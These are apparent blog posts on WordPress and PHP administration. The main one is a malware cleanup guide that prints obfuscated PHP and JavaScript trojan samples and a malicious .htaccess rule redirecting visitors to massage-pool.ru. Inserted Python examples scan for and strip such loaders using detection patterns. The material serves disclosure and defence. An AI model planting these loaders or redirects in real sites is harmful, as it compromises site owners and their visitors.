Could not connect to LiveReload server

I’m using Vagrant, VirtualBox, guard-livereload, the Chrome browser, and Windows 7.

I’m using the following command to log in to the Vagrant box over SSH:
$ ssh 127.0.0.1 -p 2222 -i ~/.vagrant.d/insecure_private_key -l vagrant

For my browser to reach the LiveReload server running inside the box, I need to open the SSH connection with a local port forward, so that port 35729 on my Windows host is tunnelled to port 35729 on the guest’s loopback interface:
Sample: $ ssh -L 35729:127.0.0.1:35729 <vagrant-ssh-config>
$ ssh -L 35729:127.0.0.1:35729 127.0.0.1 -p 2222 -i ~/.vagrant.d/insecure_private_key -l vagrant

Whew! You can now connect to the LiveReload server.

By the way, this is my Guardfile:

...
guard 'livereload', :host => '127.0.0.1', :port => '35729' do
  watch(%r{.+\.(html)$})
  watch(%r{stylesheets/.+\.(css)})
  watch(%r{javascripts/.+\.(js)})
end
...

Posted in Uncategorized | Leave a comment

How to login to your server using SSH in PuTTY.

PuTTY is a free, open source terminal emulator that supports SSH and Telnet. I often use PuTTY to connect to my server for tasks like creating backup files, running simple scripts, and deleting or moving files.

Below are the steps for logging in to your server with PuTTY.

  1. Download and install PuTTY
  2. Configure PuTTY
    Enter your host name or IP address.

    Example:
    123.45.67.89
    yourwebsite.com

  3. Credentials
    Enter your login username and password. You’ll notice that while you
    type the password the cursor does not move and nothing, not even an
    asterisk (*), is displayed; keep typing and press Enter when you’re
    done.

Done. You are now logged in. Please be careful when using PuTTY: you might delete, move, or overwrite your existing files. This is a powerful tool. If you need further information you can contact your hosting support about it, or you can contact me. :)

Posted in Uncategorized | Leave a comment

Remove WordPress Header Tags

Add the code below to your [CURRENT_THEME_FOLDER]/functions.php file (if the file already opens with <?php, paste only the remove_action() lines).

<?php
remove_action( 'wp_head', 'feed_links_extra', 3 ); // links to the extra feeds such as category feeds
remove_action( 'wp_head', 'feed_links', 2 ); // links to the general feeds: post and comment feed
remove_action( 'wp_head', 'rsd_link' ); // link to the Really Simple Discovery service endpoint (EditURI link)
remove_action( 'wp_head', 'wlwmanifest_link' ); // link to the Windows Live Writer manifest file
remove_action( 'wp_head', 'index_rel_link' ); // index link
remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 ); // prev link
remove_action( 'wp_head', 'start_post_rel_link', 10, 0 ); // start link
remove_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 ); // relational links for the posts adjacent to the current post
remove_action( 'wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0 ); // same links under the name WordPress 3.0+ hooks them with
remove_action( 'wp_head', 'wp_generator' ); // generator meta tag on the wp_head hook, which discloses the WordPress version
?>
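To verify that the snippet took effect, here is an added check (example code, not part of this post and not WordPress code) that parses a page’s <head> and reports the fingerprint tags the remove_action() calls above target: the generator meta tag that discloses the WordPress version, the EditURI and wlwmanifest links, the prev/next/start/index relational links, and the RSS feed links. The two HTML heads are constructed samples using the host example.invalid; feed audit_head() the real markup of your own site (for example the response body fetched with urllib) to check it.

```python
"""Audit a page's <head> for the WordPress fingerprint tags the snippet removes.
Added example; uses only the standard library."""
from html.parser import HTMLParser

# Constructed sample heads (not captured from a real site): one before the
# remove_action() snippet is applied, one after.
HEAD_BEFORE = """<html><head>
<link rel="alternate" type="application/rss+xml" title="Site &raquo; Feed" href="https://example.invalid/feed/" />
<link rel="alternate" type="application/rss+xml" title="Site &raquo; Comments Feed" href="https://example.invalid/comments/feed/" />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://example.invalid/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://example.invalid/wp-includes/wlwmanifest.xml" />
<link rel="prev" title="Older post" href="https://example.invalid/older/" />
<meta name="generator" content="WordPress 3.4.2" />
</head><body></body></html>"""

HEAD_AFTER = """<html><head>
<link rel="stylesheet" href="https://example.invalid/style.css" />
</head><body></body></html>"""

# rel values that disclose site structure or tooling. They correspond to the
# snippet's hooks: rsd_link -> EditURI, wlwmanifest_link -> wlwmanifest,
# the *_rel_link hooks -> prev/next/start/index/up; feed_links* -> alternate RSS.
FINGERPRINT_RELS = {"edituri", "wlwmanifest", "prev", "next", "start", "index", "up"}


class HeadAuditor(HTMLParser):
    """Collect (kind, detail) tuples for every fingerprint tag seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # <link ... /> is reported through handle_startendtag, which calls this method.
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("name", "").lower() == "generator":
            self.findings.append(("generator", a.get("content", "")))
        elif tag == "link":
            rel = a.get("rel", "").lower()
            if rel in FINGERPRINT_RELS:
                self.findings.append((rel, a.get("href", "")))
            elif rel == "alternate" and "rss" in a.get("type", "").lower():
                self.findings.append(("feed", a.get("href", "")))


def audit_head(html: str) -> list:
    """Return the list of fingerprint tags found in the given HTML document."""
    parser = HeadAuditor()
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for label, doc in (("before", HEAD_BEFORE), ("after", HEAD_AFTER)):
        hits = audit_head(doc)
        print(f"{label}: {len(hits)} fingerprint tag(s)")
        for kind, detail in hits:
            print(f"  {kind}: {detail}")
```

An empty result for your live page means the snippet is active; a remaining generator entry is the one worth chasing first, because it hands a visitor the exact WordPress version.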

Posted in Wordpress | Leave a comment

WordPress Hack: Malware Scanner

This malware scanner script scans files for possible malware code and returns a list of possibly infected files. Each file is labelled eval, c99madshell, or long_text, followed by a portion of the matched code. The script matches the word “eval(…”, the sequence <?php $md5=”…”; $wp_salt=”…”; … (also known as ‘c99madshell’), and long random-looking text such as “FEKS2121asFklMn83kUgdlf/sDkn12L+…”, because I believe these are potential malware code.

When you’re done running the malware scanner script, double-check the results before acting on them. Do not delete or clean the flagged files immediately: the script also matches clean files whenever they contain one of the three patterns above, so treat every hit as a lead, not a verdict. Please be careful.

Below are sample results:

1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response

  • File – ./website.com/wp-includes/js/tw-sack.dev.js
  • Label – eval
  • Small portion of matched code – eval(this.response
  • Not hacker code (a false positive)

2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr

  • File – ./website2.com/system/libs/65d1.php
  • Label – long_text
  • Small portion of matched code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
  • I checked the file and confirmed it was a hacker’s code.
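As an added illustration (example code, not the scanner_2.6 script offered below), here is a small Python scanner that applies the same three heuristics, eval(, the c99madshell $md5/$wp_salt loader, and long base64-like runs, to a directory tree and prints hits in the same path – label – excerpt form as the results above. It goes one step beyond the post and also flags .htaccess RewriteRule/ErrorDocument lines that point to an absolute URL, the shape of the redirect sample in the next post. The files it scans are constructed samples written to a temporary directory (the tw-sack.dev.js eval is the same benign core-script case as result 1, and attacker.invalid is a placeholder host); the long_text rule in particular will also hit minified JavaScript and embedded base64 images, which is why every hit needs the manual review the post asks for.

```python
"""Heuristic scanner for injected PHP/JS: labels each hit eval, c99madshell,
long_text or htaccess_redirect and prints a short excerpt, as the post's
scanner does. Added example; not the scanner_2.6 script."""
import os
import re
import tempfile

# The three heuristics described in the post, plus an added rule for
# .htaccess lines that redirect to an absolute URL.
PATTERNS = [
    ("c99madshell", re.compile(r"\$md5\s*=\s*[\"'][0-9a-f]{32}[\"'];\s*\$wp_salt\s*=")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("long_text", re.compile(r"[A-Za-z0-9+/=]{60,}")),
    ("htaccess_redirect", re.compile(r"^\s*(RewriteRule|ErrorDocument)\b.*\bhttps?://", re.M)),
]
EXCERPT = 40  # characters of context printed from the match start


def classify_text(text: str) -> list:
    """Return [(label, excerpt), ...] for every heuristic that matches; [] if none do."""
    hits = []
    for label, rx in PATTERNS:
        m = rx.search(text)
        if m:
            excerpt = text[m.start():m.start() + EXCERPT].replace("\n", " ")
            hits.append((label, excerpt))
    return hits


def scan_tree(root: str, exts=(".php", ".js", ".htaccess")) -> dict:
    """Map each suspicious file under root to its hit list; clean files are omitted."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = classify_text(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed sample files (not real malware): relative path -> content.
SAMPLES = {
    "wp-includes/js/tw-sack.dev.js": "function x(){ eval(this.response); }",  # benign eval, as in result 1
    "system/libs/65d1.php": "<?php $a='" + "Ab1" * 30 + "'; ?>",                # long random-looking run
    "wp-content/themes/t/hdr.php": '<?php\n$md5 = "' + "0" * 32 + '";\n$wp_salt = array(\'a\');\n?>',
    ".htaccess": "RewriteEngine On\nRewriteRule ^(.*)$ http://attacker.invalid/x.php [R=301,L]\n",
    "index.php": "<?php echo 'clean'; ?>",                                       # must not be reported
}


def demo() -> dict:
    """Write the samples to a temporary tree, scan it, and return {relative path: hits}."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        for label, excerpt in hits:
            print(f"./{path} - {label} - {excerpt}")
```

Run scan_tree() against a web root to get the same report for real files; the c99madshell rule is the only one that is close to a confirmed indicator, the other three are triage hints.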

Download Malware Scanner
To use the script you can run it in your favorite browser or from the command line (recommended):

$ time php scanner_2.6.php >> scanner_log 2>&1 | tail -f scanner_log

This command runs scanner_2.6.php and appends its output to the scanner_log file, which tail -f follows on the terminal (the redirect order matters: >> scanner_log 2>&1 sends both standard output and errors to the log).

Download: scanner_2.6.zip (3 kB)

Posted in Wordpress | 52 Comments

[Solve] WordPress Malware Script Attack Fix

Our server was hacked and all PHP files were infected. Each infected PHP file had malicious code / malware injected into it (see below); the injected code calls another PHP file and runs its program. To clean the files I had to remove the malicious code from each one, which is really frustrating when you have hundreds of infected files, so I created a script that does it automatically.

Malicious code / malware scripts I have encountered so far:

A. c99madshell – this type of malware script can view your database and access your files, just like an admin. Below is a sample:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan

<?php
...
eval(base64_decode("..."));
...

C. Trojan

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. Javascript Trojan

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. htaccess – The code below redirects visitors who arrive from search engines and other listed referrers to the hacker’s site (massage-pool.ru); the ErrorDocument lines send error pages there as well.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php

F. Timthumb Vulnerability

This script is used to crop and resize images and ships with most premium WordPress themes. Hackers found a vulnerability in it that lets them do whatever they want: with its help they can read important information from your database, insert malicious code into all of your PHP files, create additional malicious PHP scripts, and a lot more.

Any timthumb.php or thumb.php file below version 1.35 is vulnerable; I advise updating the file to version 2.0 or later.

Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php

G. class-wheel.php

As far as I could decode the file, the script sends important information about your server to thebestcache.com, then fetches data from that server and executes it. With this script the hacker can do whatever they want to your server, just as with timthumb: write RewriteRules into your .htaccess to redirect users to their site, insert malicious iframes, insert malicious JavaScript, and a lot more.

Solution: Delete this file immediately.

Below is a snippet of the script:

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Most of these attacks happen when you run old versions of your software (WordPress, Joomla, Timthumb, WP plugins), use a weak FTP or SFTP password, or have an infected computer whose FTP access the attacker can use as well. Make sure your software is up to date.

Download and Install
Download the cleaner script below and put it in your root directory (or any directory). The program checks all PHP files and cleans any that are infected with the malware code above.
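For the same job, here is an added Python cleaner (example code, not the cleaner_2.10 script offered below). It removes the two injection shapes shown in samples B and H above: a /*name_on*/ … /*name_off*/ marker block, whether it sits in its own <?php … ?> section or inside a larger one, and a stand-alone <?php eval(base64_decode("…")); ?> statement. It runs as a dry run by default, keeps a .bak copy of each file it changes, and reports how many blocks it removed per file. The infected file it works on is constructed, with placeholder base64 payloads rather than real ones.

```python
"""Strip injected loader blocks from PHP files, keeping a .bak copy of each
file changed. Added example; not the cleaner_2.10 script."""
import os
import re
import shutil
import tempfile

# Marker-delimited loader as in sample H: /*name_on*/ ... /*name_off*/ with the
# same name on both ends. The name is captured once and back-referenced so a
# block can never swallow text up to some other block's _off marker.
MARKER = r"/\*(?P<m>[A-Za-z0-9_]+?)_on\*/.*?/\*(?P=m)_off\*/"

INJECTION_PATTERNS = [
    re.compile(r"<\?php\s*" + MARKER + r"\s*\?>\s*", re.S),   # marker block in its own <?php ... ?> section
    re.compile(MARKER + r"\s*", re.S),                         # marker block inside a larger PHP section
    # Bare eval(base64_decode("...")) statement in its own <?php ... ?> section, as in sample B.
    re.compile(r"<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*[\"'][A-Za-z0-9+/=]+[\"']\s*\)\s*\)\s*;\s*\?>\s*", re.S),
]


def strip_injections(text: str) -> tuple:
    """Return (cleaned_text, blocks_removed)."""
    removed = 0
    for rx in INJECTION_PATTERNS:
        text, n = rx.subn("", text)
        removed += n
    return text, removed


def clean_file(path: str, dry_run: bool = True) -> int:
    """Count injected blocks in one file; rewrite it (after saving path.bak) unless dry_run."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    cleaned, n = strip_injections(original)
    if n and not dry_run:
        shutil.copy2(path, path + ".bak")   # keep the infected original for forensics
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return n


def clean_tree(root: str, dry_run: bool = True) -> dict:
    """Map each .php file under root that contains injections to the number removed."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                n = clean_file(path, dry_run)
                if n:
                    report[path] = n
    return report


# Constructed infected file: three injected loaders (placeholder payloads, not
# real ones) prepended to legitimate theme code.
INFECTED = (
    '<?php /*god_mode_on*/eval(base64_decode("QUFBQQ==")); /*god_mode_off*/ ?>\n'
    '<?php /*f2c3_on*/ $p = array(1, 2); eval(join("", $p)); /*f2c3_off*/ ?>\n'
    '<?php eval(base64_decode("QkJCQg==")); ?>\n'
    '<?php\n// legitimate theme code\necho "hello";\n'
)
CLEAN = '<?php\n// legitimate theme code\necho "hello";\n'


def demo() -> tuple:
    """Return (dry-run count, real count, cleaned text, backup exists) for the sample file."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "header.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(INFECTED)
        preview = clean_tree(root, dry_run=True)[path]    # nothing is written yet
        removed = clean_tree(root, dry_run=False)[path]
        with open(path, encoding="utf-8") as fh:
            cleaned = fh.read()
        return preview, removed, cleaned, os.path.exists(path + ".bak")


if __name__ == "__main__":
    preview, removed, cleaned, backed_up = demo()
    print(f"dry run found {preview} block(s); removed {removed}; backup kept: {backed_up}")
    print(cleaned)
```

Review the dry-run counts before running with dry_run=False: the marker rule will also strip a legitimate block that happens to use the same /*x_on*/ … /*x_off*/ comment convention, and the .bak copies are what you compare against if a page breaks after cleaning.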

Malware code keeps coming back
If you remove the malware code / malicious script successfully but it keeps coming back, I suggest you run the malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and send the scan result to info@php-beginners.com; we need to find the file that keeps re-injecting the malware code / malicious script.

You can download two versions of the cleaner script:
a web browser version and a shell access version. You can use either one.

  • Download Cleaner 2.10 HTTP Version below and run it in your favorite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    Download: cleaner_2.10.zip (2 kB)
  • Download Cleaner CLI 2.10 Version below and run it from a terminal or command line.
    Example: $ time php cleaner-cli_2.10.php >> cleaner_log 2>&1
    The command above runs the cleaner-cli_2.10.php script and logs its output, errors included, to the cleaner_log file.
    Download: cleaner-cli_2.10.zip (2 kB)

Note:
Please don’t forget to back up your WordPress files, or at least the /wp-content/ directory. Use shell access to back up the files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_file.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware / malicious code cleaner script works on any PHP program; you can run it on non-WordPress sites too, but please back up your files before you run the cleaner script, just to make sure you can recover them easily.

If you have encountered any malware / malicious program that I don’t know about, please let me know so that I can add it to the program. Thanks.

Posted in Uncategorized | 287 Comments